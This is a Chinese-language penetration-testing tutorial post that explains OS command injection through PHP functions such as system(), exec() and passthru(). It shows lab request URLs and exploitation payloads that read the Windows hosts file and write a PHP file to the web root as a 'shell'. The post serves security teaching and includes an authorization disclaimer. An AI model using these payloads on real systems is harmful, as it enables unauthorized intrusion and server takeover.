首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >渗透测试命令执行漏洞原理与验证(3)——系统命令执行

渗透测试命令执行漏洞原理与验证(3)——系统命令执行

原创
作者头像
zhouzhou的奇妙编程
发布2024-11-17 09:45:45
发布2024-11-17 09:45:45
2640
举报
文章被收录于专栏:渗透测试专栏渗透测试专栏

系统命令执行漏洞相关函数

允许系统命令执行的函数有:

代码语言:html
复制
system()
exec()
shell_exec()
passthru()
popen()
反引号

system()

此时执行如下命令:

代码语言:js
复制
http://192.168.186.128/OS/system.php?cmd=whoami

exec()

此时执行如下命令:

代码语言:html
复制
http://192.168.186.128/OS/exec.php?cmd=whoami

shell_exec()

此时执行如下命令:

代码语言:html
复制
http://192.168.186.128/OS/shell_exec.php?cmd=whoami

passthru()

此时执行如下命令:

代码语言:html
复制
http://192.168.186.128/OS/passthru.php?cmd=whoami

popen()

代码语言:html
复制
http://192.168.186.128/OS/popen.php?a=1

反引号

代码语言:html
复制
http://192.168.186.128/os/fdyh.php?a=1

系统命令执行漏洞的利用

代码语言:html
复制
?a=type c:\windows\system32\drivers\etc\hosts       //查看文件
?a=cd            //查看当前绝对路径
?a=echo "<?php phpinfo();?>" > E:\xampp\htdocs\php\os\phpinfo.php          //写shell

本文部分图片摘自深信服安全服务认证工程师课程课件中,为方便个人学习使用,勿作商用!!!!文字内容为自己手打,并非直接搬运!如有侵权,请联系删除!!!

本文档所提供的信息仅用于教育目的及在获得明确授权的情况下进行渗透测试。任何未经授权使用本文档中技术信息的行为都是严格禁止的,并可能违反《中华人民共和国网络安全法》及相关法律法规。使用者应当合法合规地运用所学知识,不得用于非法入侵、破坏信息系统等恶意活动。我们强烈建议所有读者遵守当地法律与道德规范,在合法范围内探索信息技术。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 系统命令执行漏洞相关函数
    • system()
    • exec()
    • shell_exec()
    • passthru()
    • popen()
    • 反引号
  • 系统命令执行漏洞的利用
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档